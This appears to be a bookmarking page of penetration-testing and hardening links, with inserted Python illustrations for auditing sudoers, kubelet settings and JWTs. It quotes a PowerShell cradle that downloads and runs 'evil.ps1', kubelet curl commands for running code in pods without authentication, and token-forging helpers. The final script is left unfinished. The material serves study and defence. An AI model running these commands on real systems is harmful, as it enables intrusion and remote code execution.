
whip_lash : security   644

How a Bitcoin Evangelist Made Himself Vanish, in 15 (Not So Easy) Steps - The New York Times
Mr. Lopp viewed the exercise as something of an experiment, to find out the lengths he’d have to go to extricate himself from the databases and other repositories that hold our personal information and make it available to anyone willing to pay for it. That helps explain why he was willing to describe the steps he’s taken with me (though he did so from a burner phone, without disclosing his new location).
privacy  security  technology 
8 days ago by whip_lash
GitHub - stevenaldinger/decker: Declarative penetration testing orchestration framework
Decker is a penetration testing orchestration framework. It leverages HashiCorp Configuration Language 2 (the same config language as Terraform) to allow declarative penetration testing as code, so your tests can be versioned, shared, reused, and collaborated on with your team or the community.
pentest  devsecops  security  tools 
17 days ago by whip_lash
GitHub - imthenachoman/How-To-Secure-A-Linux-Server: An evolving how-to guide for securing a Linux server.
An evolving how-to guide for securing a Linux server that, hopefully, also teaches you a little about security and why it matters.
linux  server  sysadmin  hardening  security 
29 days ago by whip_lash
Tool Analysis Result Sheet
This site summarizes the results of examining logs recorded in Windows upon execution of the 49 tools that are likely to be used by an attacker who has infiltrated a network. The following logs were examined. Note that it was confirmed that traces of tool execution are most likely to be left in event logs. Accordingly, examination of event logs is the main focus here.
dfir  security  threathunting  tools  windows 
29 days ago by whip_lash
Presentations – Active Directory Security
This page includes the slides and videos (if available)
activedirectory  powershell  security 
6 weeks ago by whip_lash
Extended Protection for Authentication Overview | Microsoft Docs
The solution is to use a TLS-secured outer channel and a client-authenticated inner channel, and to pass a Channel Binding Token (CBT) to the server. The CBT is a property of the TLS-secured outer channel, and is used to bind the outer channel to a conversation over the client-authenticated inner channel.

In the previous scenario, the CBT of the client-attacker TLS channel is merged with the authorization information that is sent to the server. A CBT-aware server compares the CBT co...
security  microsoft  windows  authentication 
6 weeks ago by whip_lash
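The excerpt above describes the check without showing it. The following is an added illustration (not Microsoft's code or anything from the linked page) of why a relayed NTLM authentication fails at a CBT-aware server: the client computes the token over the TLS certificate it actually negotiated, which behind a man-in-the-middle is the attacker's. The two "certificates" are constructed byte strings, and the token layout follows RFC 5929 tls-server-end-point plus the MS-NLMP MsvAvChannelBindings derivation as assumed here (MD5 over a gss_channel_bindings_struct whose only non-empty field is application_data).

```python
"""Channel Binding Token (CBT) check as used by Extended Protection for
Authentication.  Added illustration, not Microsoft's code.

Assumptions: the two 'certificates' are constructed byte strings standing
in for DER-encoded server certificates; the binding follows RFC 5929
tls-server-end-point (SHA-256 of the certificate, assuming a SHA-256
signed certificate) and the MS-NLMP MsvAvChannelBindings derivation as
assumed here (MD5 over a gss_channel_bindings_struct whose only non-empty
field is application_data)."""
import hashlib
import hmac
import struct
from typing import Dict, Tuple

# Constructed stand-ins for DER certificates; not real X.509 objects.
LEGIT_SERVER_CERT = b"DER:CN=mail.example.internal:serial=1:constructed"
ATTACKER_CERT = b"DER:CN=mail.example.internal:serial=9:constructed"


def tls_server_end_point(cert_der: bytes) -> bytes:
    """RFC 5929 tls-server-end-point: hash of the server's end-entity cert."""
    return hashlib.sha256(cert_der).digest()


def channel_binding_token(cert_der: bytes) -> bytes:
    """Value of the MsvAvChannelBindings AV_PAIR in an NTLMv2 response:
    MD5(gss_channel_bindings_struct).  The four address type/length fields
    are zero, followed by application_data length and bytes (assumed layout)."""
    app_data = b"tls-server-end-point:" + tls_server_end_point(cert_der)
    gss_struct = struct.pack("<IIII", 0, 0, 0, 0) + struct.pack("<I", len(app_data)) + app_data
    return hashlib.md5(gss_struct).digest()


def client_authenticate(outer_channel_cert: bytes) -> Dict[str, bytes]:
    """The client binds its inner-channel (NTLM) authentication to the TLS
    channel it actually negotiated.  Behind a MITM that channel ends at the
    attacker, so the CBT is computed over the attacker's certificate."""
    return {"user": b"alice", "cbt": channel_binding_token(outer_channel_cert)}


def server_accepts(server_cert: bytes, auth: Dict[str, bytes], cbt_aware: bool = True) -> bool:
    """A CBT-aware server recomputes the token for its own TLS channel and
    rejects authentication bound to a different channel.  A legacy server
    ignores the AV_PAIR and accepts the relayed credentials."""
    if not cbt_aware:
        return True
    return hmac.compare_digest(channel_binding_token(server_cert), auth["cbt"])


def relay_scenario(cbt_aware: bool) -> Tuple[bool, bool]:
    """Returns (direct login accepted, relayed login accepted)."""
    direct = server_accepts(LEGIT_SERVER_CERT, client_authenticate(LEGIT_SERVER_CERT), cbt_aware)
    # Relay: client -> attacker TLS channel; the attacker forwards the NTLM
    # messages unchanged to the real server over its own TLS channel.
    relayed = server_accepts(LEGIT_SERVER_CERT, client_authenticate(ATTACKER_CERT), cbt_aware)
    return direct, relayed


if __name__ == "__main__":
    print("CBT-aware server (direct, relayed):", relay_scenario(True))
    print("legacy server   (direct, relayed):", relay_scenario(False))
```

The attacker cannot simply patch the token, because it travels inside the NTLMv2 response that is keyed with the user's password hash; that is what makes the binding effective, and also why EPA only helps when the server side is configured to require it.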
Abusing Exchange: One API call away from Domain Admin -
In most organisations using Active Directory and Exchange, Exchange servers have such high privileges that being an Administrator on an Exchange server is enough to escalate to Domain Admin. Recently I came across a blog from the ZDI, in which they detail a way to let Exchange authenticate to attackers using NTLM over HTTP. This can be combined with an NTLM relay attack to escalate from any user with a mailbox to Domain Admin in probably 90% of the organisations I’ve seen that use Ex...
exchange  windows  security  pentest  activedirectory 
6 weeks ago by whip_lash
Sh00T - A Testing Environment for Manual Security Testers - KitPloit - PenTest & Hacking Tools for your CyberSecurity Kit ☣
Sh00T is a task manager to let you focus on performing security testing
provides To Do checklists of test cases
helps to create bug reports with customizable bug templates
pentest  security  tool  notes 
7 weeks ago by whip_lash
Linux Privilege Escalation – Using apt-get/apt/dpkg to abuse sudo “NOPASSWD” misconfiguration – Logan S Diomedi – lsdsecurity
There are many well-known and documented attack vectors for the sudo command. Please see my Useful Resources page for the Windows & Linux Privilege Escalation piece that contains a ton of helpful knowledge in this category. Today, we're going to be using a very poorly documented feature in apt-get when a normal user is allowed to execute apt-get as a root user. Let's dive in!
linux  privesc  privilegeescalation  sudo  pentest  security 
8 weeks ago by whip_lash
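The check a defender wants after reading the post above is a sudoers audit that flags NOPASSWD grants for package managers, since restricting the argument list does not help when the binary itself offers hooks and pagers that run as root. The script below is an added example, not from the linked post; the post's exact apt-get feature is not quoted on this page, so the escape descriptions in the table are the publicly documented ones (option hooks such as -o APT::Update::Pre-Invoke::=, the changelog pager, dpkg maintainer scripts). The sudoers text is constructed.

```python
"""Flag sudoers rules that give passwordless root access to binaries with
known shell escapes.  Added example; the sudoers content is constructed."""
import os
import re
from typing import Dict, List

# Why each binary is dangerous under NOPASSWD (from public documentation;
# extend from GTFOBins for a real audit).
SHELL_ESCAPE_BINARIES = {
    "apt-get": "option hooks (-o APT::Update::Pre-Invoke::=...) and the changelog pager run as root",
    "apt": "same option hooks and pager as apt-get",
    "dpkg": "dpkg -i runs package maintainer scripts as root; dpkg -l drops into a pager",
}

# user host=(runas) TAG: cmd, cmd  (aliases and Defaults lines are skipped)
SUDOERS_RULE = re.compile(r"""
    ^(?P<who>[^\s#]+)\s+                 # user, %group
    (?P<host>[^\s=]+)\s*=\s*             # host list
    (?:\((?P<runas>[^)]*)\)\s*)?         # optional (runas_user[:runas_group])
    (?P<tags>(?:[A-Z]+:\s*)*)            # NOPASSWD:, SETENV:, ...
    (?P<cmds>.+)$""", re.VERBOSE)

SAMPLE_SUDOERS = """\
# constructed /etc/sudoers for the example
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
deploy  ALL=(root) NOPASSWD: /usr/bin/apt-get update, /usr/bin/apt-get upgrade
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
ci      ALL=(ALL) NOPASSWD: /usr/bin/dpkg -i *
www-data ALL=(root) NOPASSWD: /bin/systemctl restart nginx
"""


def parse_sudoers(text: str) -> List[Dict]:
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")):
            continue
        m = SUDOERS_RULE.match(line)
        if not m:
            continue
        runas = (m.group("runas") or "root").split(":")[0]  # sudo defaults to root
        rules.append({
            "who": m.group("who"),
            "runas": runas,
            "nopasswd": "NOPASSWD" in m.group("tags"),
            "cmds": [c.strip() for c in m.group("cmds").split(",")],
        })
    return rules


def audit(text: str) -> List[Dict[str, str]]:
    """Return one finding per NOPASSWD command that can be turned into a root shell."""
    findings = []
    for rule in parse_sudoers(text):
        if not rule["nopasswd"] or rule["runas"] not in ("root", "ALL"):
            continue
        for cmd in rule["cmds"]:
            if cmd == "ALL":
                findings.append({"who": rule["who"], "cmd": cmd, "reason": "any command as root without a password"})
                continue
            binary = os.path.basename(cmd.split()[0])
            if binary in SHELL_ESCAPE_BINARIES:
                findings.append({"who": rule["who"], "cmd": cmd, "reason": SHELL_ESCAPE_BINARIES[binary]})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_SUDOERS):
        print(f"{f['who']:10} {f['cmd']:40} {f['reason']}")
```

The deploy rule looks tightly scoped (only update and upgrade), yet both findings stand because apt-get's own option handling does the escaping; the fix is a root-owned wrapper script that hard-codes the command, with the sudo rule pointing at the wrapper.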
How to write a rootkit without really trying | Trail of Bits Blog
Fault injection finds bugs in places that fuzzing and conventional unit testing often won’t:

NULL dereferences caused by assuming that particular functions never fail (are you sure you always check whether getcwd(2) succeeds?) Are you sure that you’re doing better than systemd?
Memory corruption caused by unexpectedly small buffers, or disclosure caused by unexpectedly large buffers
Integer over/underflow caused by invalid or unexpected values (are you sure you're not making incorrect assumptions about stat(2)'s atime/mtime/ctime fields?)
linux  security  kernel  syscall 
9 weeks ago by whip_lash
Kubernetes: unauth kublet API 10250 token theft & kubectl - Carnal0wnage & Attack Research Blog
do a curl -s https://k8-node:10250/runningpods/ to get a list of running pods

With that data, you can craft your post request to exec within a pod so we can poke around.
kubernetes  pentest  security  vulnerability 
9 weeks ago by whip_lash
Kubernetes: unauth kublet API 10250 basic code exec - Carnal0wnage & Attack Research Blog
Unauth API access (10250)

Most Kubernetes deployments provide authentication for this port. But it’s still possible to expose it inadvertently and it's still pretty common to find it exposed via the "insecure API service" option.

Everybody who has access to the service kubelet port (10250), even without a certificate, can execute any command inside the container.
kubernetes  security  pentest  vulnerability 
9 weeks ago by whip_lash
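Both Carnal0wnage posts above turn a /runningpods/ listing into a POST against a pod. The following is an added example (not code from the posts) that does the bookkeeping offline: it parses a constructed /runningpods/ response into (namespace, pod, container) targets, builds the curl invocation for the kubelet /run/ endpoint, and, for the defender, audits a KubeletConfiguration for the settings that leave 10250 open. The JSON and configs are constructed; nothing is sent.

```python
"""Kubelet port 10250: exec targets from /runningpods/ and a config audit.
Added example; the JSON and config dictionaries are constructed."""
import json
from typing import List, Tuple
from urllib.parse import quote

# Constructed /runningpods/ body (shape follows the PodList the kubelet returns).
RUNNING_PODS_JSON = json.dumps({
    "kind": "PodList",
    "items": [
        {"metadata": {"name": "kube-dns-5c47645d67-x2r4k", "namespace": "kube-system"},
         "spec": {"containers": [{"name": "kubedns"}, {"name": "dnsmasq"}, {"name": "sidecar"}]}},
        {"metadata": {"name": "web-7d9f8b6c5-qq2lp", "namespace": "default"},
         "spec": {"containers": [{"name": "web"}]}},
    ],
})


def exec_targets(running_pods_json: str) -> List[Tuple[str, str, str]]:
    """Every (namespace, pod, container) triple a /run/ request can address."""
    pods = json.loads(running_pods_json)
    out = []
    for pod in pods.get("items", []):
        ns, name = pod["metadata"]["namespace"], pod["metadata"]["name"]
        for c in pod["spec"].get("containers", []):
            out.append((ns, name, c["name"]))
    return out


def run_request(node: str, ns: str, pod: str, container: str, cmd: str) -> List[str]:
    """curl argv for POST /run/{namespace}/{pod}/{container} with body cmd=...
    (the kubelet debug endpoint the posts use; -k because the serving cert is
    usually self-signed)."""
    url = f"https://{node}:10250/run/{quote(ns)}/{quote(pod)}/{quote(container)}"
    return ["curl", "-sk", "-X", "POST", url, "--data-urlencode", f"cmd={cmd}"]


# Constructed KubeletConfiguration fragments: the weak one beside the fix.
WEAK_KUBELET_CONFIG = {
    "kind": "KubeletConfiguration",
    "authentication": {"anonymous": {"enabled": True}, "webhook": {"enabled": False}},
    "authorization": {"mode": "AlwaysAllow"},
    "readOnlyPort": 10255,
}
HARDENED_KUBELET_CONFIG = {
    "kind": "KubeletConfiguration",
    "authentication": {"anonymous": {"enabled": False}, "webhook": {"enabled": True},
                       "x509": {"clientCAFile": "/etc/kubernetes/pki/ca.crt"}},
    "authorization": {"mode": "Webhook"},
    "readOnlyPort": 0,
}


def audit_kubelet_config(cfg: dict) -> List[str]:
    """Fail closed: a missing key is reported as the weak setting."""
    auth = cfg.get("authentication", {})
    findings = []
    if auth.get("anonymous", {}).get("enabled", True):
        findings.append("authentication.anonymous.enabled is true: unauthenticated callers reach 10250")
    if not auth.get("webhook", {}).get("enabled", False):
        findings.append("authentication.webhook.enabled is false: bearer tokens are not checked with the API server")
    if cfg.get("authorization", {}).get("mode", "AlwaysAllow") == "AlwaysAllow":
        findings.append("authorization.mode is AlwaysAllow: any caller may run/exec in every pod")
    if cfg.get("readOnlyPort", 0) != 0:
        findings.append(f"readOnlyPort {cfg['readOnlyPort']} is open: pod listing without authentication")
    return findings


if __name__ == "__main__":
    for target in exec_targets(RUNNING_PODS_JSON):
        print(" ".join(run_request("k8-node", *target, "id")))
    for line in audit_kubelet_config(WEAK_KUBELET_CONFIG):
        print("WEAK:", line)
```

With the hardened configuration the same curl returns 401; the run/exec handlers still exist, so network policy on 10250 and the authorization webhook (which maps the request to a nodes/proxy RBAC check) are the controls, not the absence of the endpoint.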
Attacking Kubernetes through Kubelet
Shared via a tweet by Binni Shah (@binitamshah), January 14, 2019.
kubernetes  pentest  vulnerability  security 
9 weeks ago by whip_lash
Powershell Script for Enumerating Vulnerable DCOM Applications: DCOMrade
DCOMrade is a PowerShell script that is able to enumerate the possibly vulnerable DCOM applications that might allow for lateral movement, code execution, data exfiltration, etc. The script is built to work with PowerShell 2.0 but will work with all versions above as well.
dcom  windows  pentest  powershell  postexploitation  security 
10 weeks ago by whip_lash
Lateral Movement via DCOM: Round 2 | enigma0x3
This resulted in identifying the MMC20.Application COM object and its “ExecuteShellCommand” method, which you can read more about here. Thanks to the help of James Forshaw (@tiraniddo), we determined that the MMC20.Application object lacked explicit “LaunchPermissions”, resulting in the default permission set allowing Administrators access:
dcom  security  windows  postexploitation  pentest 
10 weeks ago by whip_lash
SlavaSoft HashCalc - Hash, CRC, and HMAC Calculator
A fast and easy-to-use calculator that allows to compute message digests, checksums and HMACs for files, as well as for text and hex strings. It offers a choice of 13 of the most popular hash and checksum algorithms for calculations.
hash  hashes  security 
10 weeks ago by whip_lash
Veritas® Traveller's Doorstop - Lee Valley Tools
To use it, you just slide the wedge under the door and elevate it with the screw until the door is solidly wedged. Anyone attempting entry causes the door to wedge tighter in the frame while the pointed screw keeps the wedge from shifting. The screw can be used with concrete subfloors as well as the traditional carpet-covered subfloors.
physical  security  travel 
10 weeks ago by whip_lash
Glibc Heap Exploitation Basics : Introduction to ptmalloc2 internals (Part 1)
In this post and the others in this series, I will unpack some of the internals to glibc's dynamic heap data structures and associated beasts. This post specifically will start you off with no background insight on the heap (perhaps a little on ELF internals and debugging), and detail some experiments you can perform to learn how the heap works.
exploits  security  heap  memory 
11 weeks ago by whip_lash
Fuzzing Like It’s 1989 | Trail of Bits Blog
Fuzzing has been a simple and reliable way to find bugs in programs for the last 30 years. While fuzzing research is advancing rapidly, even the simplest attempts that reuse 30-year-old code are successful at identifying bugs in modern Linux utilities.

The original fuzzing papers do a great job at foretelling the dangers of C and the security issues it would cause for decades. They argue convincingly that C makes it too easy to write unsafe code and should be avoided if possible. More directly, the papers show that even naive fuzz testing still exposes bugs, and such testing should be incorporated as a standard software development practice. Sadly, this advice was not followed for decades.
c  fuzzing  security 
11 weeks ago by whip_lash
learn-json-web-tokens/ at master · dwyl/learn-json-web-tokens · GitHub
JSON Web Tokens (JWTs) make it easy to send read-only signed "claims" between services (both internal and external to your app/site). Claims are any bits of data that you want someone else to be able to read and/or verify but not alter.
authentication  security  webdev  webapp  jwt  json 
11 weeks ago by whip_lash
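"Read and/or verify but not alter" is the whole point of the signature, so the verifier is where JWT bugs live. The block below is an added example, not from the dwyl repository: an HS256 signer and a verifier that pins the algorithm (rejecting alg "none" and any algorithm swap), compares signatures in constant time and enforces exp, followed by two helpers that produce the tokens an attacker would try. The key and claims are constructed.

```python
"""Minimal HS256 JWT sign/verify with the checks that matter.
Added example; KEY and SAMPLE_CLAIMS are constructed."""
import base64
import hashlib
import hmac
import json
import time
from typing import Optional

KEY = b"constructed-demo-key-do-not-reuse"           # constructed
SAMPLE_CLAIMS = {"sub": "alice", "admin": False, "exp": 1_700_000_000}


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _json_bytes(obj: dict) -> bytes:
    return json.dumps(obj, separators=(",", ":")).encode()


def sign_hs256(claims: dict, key: bytes) -> str:
    signing_input = _b64url(_json_bytes({"alg": "HS256", "typ": "JWT"})) + "." + _b64url(_json_bytes(claims))
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url(sig)


def verify_hs256(token: str, key: bytes, now: Optional[float] = None) -> dict:
    """Return the claims or raise ValueError.  The header's alg is not trusted:
    the verifier decides the algorithm, so 'none' and RS256/HS256 confusion
    are rejected before any signature work."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    h64, p64, s64 = parts
    header = json.loads(_b64url_decode(h64))
    if header.get("alg") != "HS256":
        raise ValueError(f"unexpected alg {header.get('alg')!r}")
    expected = hmac.new(key, f"{h64}.{p64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(s64)):
        raise ValueError("bad signature")
    claims = json.loads(_b64url_decode(p64))
    now = time.time() if now is None else now
    if "exp" in claims and now >= claims["exp"]:
        raise ValueError("expired")
    return claims


def is_valid(token: str, key: bytes, now: Optional[float] = None) -> bool:
    try:
        verify_hs256(token, key, now)
        return True
    except ValueError:          # covers JSON and base64 errors too
        return False


def tamper_payload(token: str, **changes) -> str:
    """What an attacker does: edit the claims and keep the old signature."""
    h64, p64, s64 = token.split(".")
    claims = json.loads(_b64url_decode(p64))
    claims.update(changes)
    return h64 + "." + _b64url(_json_bytes(claims)) + "." + s64


def alg_none_token(claims: dict) -> str:
    """An unsigned token; libraries that honour the header accept it."""
    return _b64url(_json_bytes({"alg": "none", "typ": "JWT"})) + "." + _b64url(_json_bytes(claims)) + "."


if __name__ == "__main__":
    tok = sign_hs256(SAMPLE_CLAIMS, KEY)
    print("valid:", is_valid(tok, KEY, now=1_600_000_000))
    print("tampered:", is_valid(tamper_payload(tok, admin=True), KEY, now=1_600_000_000))
    print("alg none:", is_valid(alg_none_token({**SAMPLE_CLAIMS, "admin": True}), KEY, now=1_600_000_000))
```

Note that the claims are only base64url-encoded, not encrypted: anyone holding the token can read them, which is the "read-only" in the excerpt, so secrets never belong in the payload.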
The Ultimate PHP Security Checklist - DZone Security
This security checklist aims to give developers a list of PHP security best practices they can follow to help improve the security of their code.
php  webapp  security 
11 weeks ago by whip_lash
NTAPI Undocumented Functions
This is an advanced, low-level programer's guide to Windows NT Kernel, Native API and drivers.
All remarks, fixes and comments are very welcome.
api  kernel  programming  security  windows 
11 weeks ago by whip_lash
flAWS 2
flAWS 2 has two paths this time: Attacker and Defender! In the Attacker path, you'll exploit your way through misconfigurations in serverless (Lambda) and containers (ECS Fargate). In the Defender path, that target is now viewed as the victim and you'll work as an incident responder for that same app, understanding how an attack happened. You'll get access to logs of a previous successful attack. As a Defender you'll learn the power of jq in analyzing logs, and instructions on how to set up Athena in your own environment.
aws  security  pentest  pentesting  ctf  tutorial 
11 weeks ago by whip_lash
GitHub - pentesteracademy/patoolkit: PA Toolkit is a collection of traffic analysis plugins focused on security
PA Toolkit contains plugins (both dissectors and taps) covering various scenarios for multiple protocols, including:

WiFi (WiFi network summary, Detecting beacon, deauth floods etc.)
HTTP (Listing all visited websites, downloaded files)
HTTPS (Listing all websites opened on HTTPS)
ARP (MAC-IP table, Detect MAC spoofing and ARP poisoning)
DNS (Listing DNS servers used and DNS resolution, Detecting DNS Tunnels)
The project is under active development and more plugins will be added in near future.
analysis  http  network  pentesting  https  wireshark  pcap  security 
12 weeks ago by whip_lash
Hexacorn | Blog
The latest EDR sheet can be found here.
dfir  reference  security  edr  antivirus 
december 2018 by whip_lash
GitHub - trimstray/the-book-of-secret-knowledge: A collection of awesome lists, manuals, blogs, hacks, one-liners, cli/web tools and more. Especially for System and Network Administrators, DevOps, Pentesters or Security Researchers.
A collection of awesome lists, manuals, blogs, hacks, one-liners, cli/web tools and more. Especially for System and Network Administrators, DevOps, Pentesters or Security Researchers.
github  linux  security  software  tools 
december 2018 by whip_lash
From blind XXE to root-level file read access | Honoki
Below, I will outline the thought process that helped me make sense of what I encountered, and that in the end allowed me to elevate what seemed to be a medium-criticality vulnerability into a critical finding.

I will put deliberate emphasis on the various error messages that I encountered in the hope that it can point others in the right direction in the future.
java  security  xxe  pentest 
december 2018 by whip_lash
Red XOR Blue: SharpCradle - Loading remote C# binaries and executing them in memory
SharpCradle isn't exactly the same as our traditional powershell download cradle ( IEX (New-Object Net.Webclient).downloadstring("http://IP/evil.ps1") ) but the concept, at least to me, is the same.  We are simply reaching out from our victim's machine to somewhere remotely and retrieving our evil code and executing it in memory.  This helps in bypassing endpoint protections by making it harder to detect what exactly we are up to.  In fact, I have used this on a wide variety of client engagements and it has yet to get flagged, though I am sure that will eventually change as defenses are getting better every day.
c#  pentest  security 
december 2018 by whip_lash
A Collection of Resources for Getting Started in ICS/SCADA Cybersecurity – Robert M. Lee
I commonly get asked by folks what approach they should take to get started in industrial control system (ICS) cybersecurity. Sometimes these individuals have backgrounds in control systems, sometimes they have backgrounds in security, and sometimes they are completely new to both.
ics  security  pentest 
december 2018 by whip_lash
Security Education Companion
Welcome to the Security Education Companion! SEC is a resource for people teaching digital security to their friends and neighbors.
security  education 
december 2018 by whip_lash
GitHub - Voorivex/pentest-guide: Penetration tests cases, resources and guidelines.
This guide is for penetration testers seeking the appropriate test cases required during a penetration test project. I rearranged the OWASP Testing Guide v4 from my point of view into 9 Test Classes, each of which has several Test Cases to conduct against the target. Each Test Case covers several OWASP tests, which is also useful for the report document. I've also added 10 extra Test Cases marked EXTRA-TEST. I hope it will be useful in both penetration test projects and bug bounties.
pentest  security  owasp  webapp 
november 2018 by whip_lash
SANS Institute: Reading Room - Cloud Computing
Companies using AWS (Amazon Web Services) will find that traditional means of full packet capture using span ports is not possible. As defined in the AWS Service Level Agreement, Amazon runs certain aspects of the cloud platform and does not give customers access to physical networking hardware. Although access to physical network equipment is limited, packet capture is still possible on AWS but needs to be architected in a different way.
aws  networking  security 
november 2018 by whip_lash
How Netflix gives all its engineers SSH access - O'Reilly Media
Russell Lewis outlines Netflix’s SSH bastion architecture, which allows them to audit and automatically alert after the fact rather than slowing down engineers before granting access.
ssh  security  devops  video 
october 2018 by whip_lash
Errata Security: TCP/IP, Sockets, and SIGPIPE
There is a spectre haunting the Internet -- the spectre of SIGPIPE errors. It's a bug in the original design of Unix networking from 1981 that is perpetuated by college textbooks, which teach students to ignore it. As a consequence, sometimes software unexpectedly crashes. This is particularly acute on industrial and medical networks, where security professionals can't run port/security scans for fear of crashing critical devices.
programming  network  unix  security  sigpipe  tcp 
october 2018 by whip_lash
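The crash the excerpt describes is reproducible without a network: write to a socket whose peer has gone away. The block below is an added example (not from the Errata post) using a local socketpair. It shows the two survivable outcomes, SIGPIPE ignored so the write fails with EPIPE, and MSG_NOSIGNAL on the call itself, and then runs the same write in a child process with the 1981 default handler restored, which is what kills unprepared daemons and embedded devices when a scanner drops a connection. It assumes a Unix host.

```python
"""SIGPIPE versus EPIPE on a write to a closed peer.  Added example; uses
a local socketpair and a child interpreter, no network."""
import signal
import socket
import subprocess
import sys


def ignore_sigpipe() -> None:
    """What a server or scanner should do at startup: turn SIGPIPE into an
    EPIPE error that the write call reports.  (Python already does this.)"""
    signal.signal(signal.SIGPIPE, signal.SIG_IGN)


def write_after_peer_close(use_nosignal: bool) -> str:
    """Returns 'delivered', 'EPIPE' or 'ECONNRESET' for a write after the
    peer closed.  With SIGPIPE ignored (or MSG_NOSIGNAL set) the process
    survives and gets the error; with SIG_DFL it would not return at all."""
    a, b = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)
    b.close()                                    # peer goes away
    try:
        flags = getattr(socket, "MSG_NOSIGNAL", 0) if use_nosignal else 0
        a.send(b"probe\n", flags)
        return "delivered"
    except BrokenPipeError:
        return "EPIPE"
    except ConnectionResetError:
        return "ECONNRESET"
    finally:
        a.close()


# The unprepared program: default SIGPIPE disposition, then the same write.
CHILD_SNIPPET = (
    "import signal, socket\n"
    "signal.signal(signal.SIGPIPE, signal.SIG_DFL)\n"
    "a, b = socket.socketpair()\n"
    "b.close()\n"
    "a.send(b'probe')\n"
)


def child_with_default_sigpipe() -> int:
    """Run the write in a child with SIG_DFL; subprocess reports a signal
    death as a negative signal number, so -13 (SIGPIPE) means it was killed."""
    return subprocess.run([sys.executable, "-c", CHILD_SNIPPET], capture_output=True).returncode


if __name__ == "__main__":
    ignore_sigpipe()
    print("SIGPIPE ignored:     ", write_after_peer_close(use_nosignal=False))
    print("MSG_NOSIGNAL on send:", write_after_peer_close(use_nosignal=True))
    print("child with SIG_DFL exited with", child_with_default_sigpipe())
```

The child never reaches a Python exception: the kernel delivers SIGPIPE on the send and the process dies, which is exactly the failure that makes half-open connections from a port scan dangerous to fragile devices.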
Rotten Potato – Privilege Escalation from Service Accounts to SYSTEM
NTLM relay from the local “NT AUTHORITY\SYSTEM” (we will just call it SYSTEM for brevity) account back to some other system service has been the theme for the Potato privilege escalation exploits. The first step is to trick the SYSTEM account into performing authentication to some TCP listener we control.

In the original Hot Potato exploit, we did some complex magic with NBNS spoofing, WPAD, and Windows Update services to trick it into authenticating to us over HTTP. For more information, see the original blog post.

Today, we’ll be discussing another method to accomplish the same end goal which James Forshaw discussed here. We’ll basically be tricking DCOM/RPC into NTLM authenticating to us. The advantage of this more complex method is that it is 100% reliable, consistent across Windows versions, and fires instantly rather than sometimes having to wait for Windows Update.
security  pentest  windows  privesc  privilegeescalation 
september 2018 by whip_lash
Juicy Potato (abusing the golden privileges) | juicy-potato
If the user has SeImpersonate or SeAssignPrimaryToken privileges then you are SYSTEM.

It’s nearly impossible to prevent the abuse of all these COM Servers. You could think to modify the permissions of these objects via DCOMCNFG but good luck, this is gonna be challenging.

The actual solution is to protect sensitive accounts and applications which run under the * SERVICE accounts. Stopping DCOM would certainly inhibit this exploit but could have a serious impact on the underlying OS.
pentest  windows  privilegeescalation  security 
september 2018 by whip_lash
From Kekeo to Rubeus – Posts By SpecterOps Team Members
Today I’m releasing Rubeus, the start of a C# reimplementation of some (not all) of Kekeo’s functionality. I’ve wanted to dive deeper into Kerberos structures and exchanges for a while in order to better understand the entire system, and this project provided the perfect excuse to jump right in.
kerberos  activedirectory  security  pentest  tool 
september 2018 by whip_lash
FuzzySecurity | Windows Userland Persistence Fundamentals
This tutorial will cover several techniques that can be used to gain persistent access to Windows machines. Usually this doesn't enter into play during a pentest (with the exception of red team engagements) as there is no benefit to adding it to the scope of the project. That is not to say it is not an interesting subject, both from a defensive and offensive perspective.
persistence  windows  pentest  redteam  security 
september 2018 by whip_lash
The pitfalls of using ssh-agent, or how to use an agent safely
I probably sound like a broken record by now, but something like ssh-ident allows you to keep different keys in different agents, easily, while loading agents and keys on demand, keep your identities separated, and easily set a timeout while reloading all keys as necessary.
linux  security  ssh 
september 2018 by whip_lash
Script Get All AD Users Logon History with their Logged on Computers (with IPs)& OUs
This script will list AD users' logon information with their logged-on computers by inspecting the Kerberos TGT request events (Event ID 4768) from domain controllers. Not only the user account name is fetched, but also the user's OU path and computer accounts are retrieved. You can also list the history of the last logged-on users. In environments where Exchange servers are used, the Exchange servers' authentication requests for users will also be logged, since Exchange also uses Event ID 4768 for TGT requests. You can also export the result to CSV format. PowerShell version 3.0 is needed to use the script. You can define the following parameters to suit your needs:
ad  security  powershell  Scripting 
september 2018 by whip_lash
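The core of that script is a join between two kinds of 4768 events: computer accounts (names ending in $) tell you which host sits at a client address, and user accounts tell you who requested a TGT from it. The following is an added example, not the script from the gallery page, that does the join over constructed event text laid out like the fields of a 4768 message (TimeCreated, Account Name, Client Address, Result Code). It also handles the Exchange caveat the description raises by excluding the Exchange servers' addresses, and drops failed requests (Result Code other than 0x0).

```python
"""Logon history from Kerberos TGT requests (Event ID 4768).
Added example; the events and the Exchange address are constructed."""
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Optional

FIELD_RE = re.compile(r"^\s*(TimeCreated|Account Name|Client Address|Result Code):\s*(.+?)\s*$", re.M)

# Constructed records, one per block, with the four fields the join needs.
SAMPLE_4768 = """\
TimeCreated: 2018-09-03 08:12:44
Account Name: WS-0421$
Client Address: ::ffff:10.10.5.21
Result Code: 0x0
---
TimeCreated: 2018-09-03 08:12:51
Account Name: alice
Client Address: ::ffff:10.10.5.21
Result Code: 0x0
---
TimeCreated: 2018-09-03 08:15:02
Account Name: bob
Client Address: ::ffff:10.10.7.8
Result Code: 0x0
---
TimeCreated: 2018-09-03 08:20:17
Account Name: alice
Client Address: ::ffff:10.10.0.50
Result Code: 0x0
---
TimeCreated: 2018-09-03 08:21:40
Account Name: carol
Client Address: ::ffff:10.10.7.8
Result Code: 0x6
"""
EXCHANGE_SERVER_IPS = {"10.10.0.50"}     # constructed; Exchange requests TGTs on users' behalf


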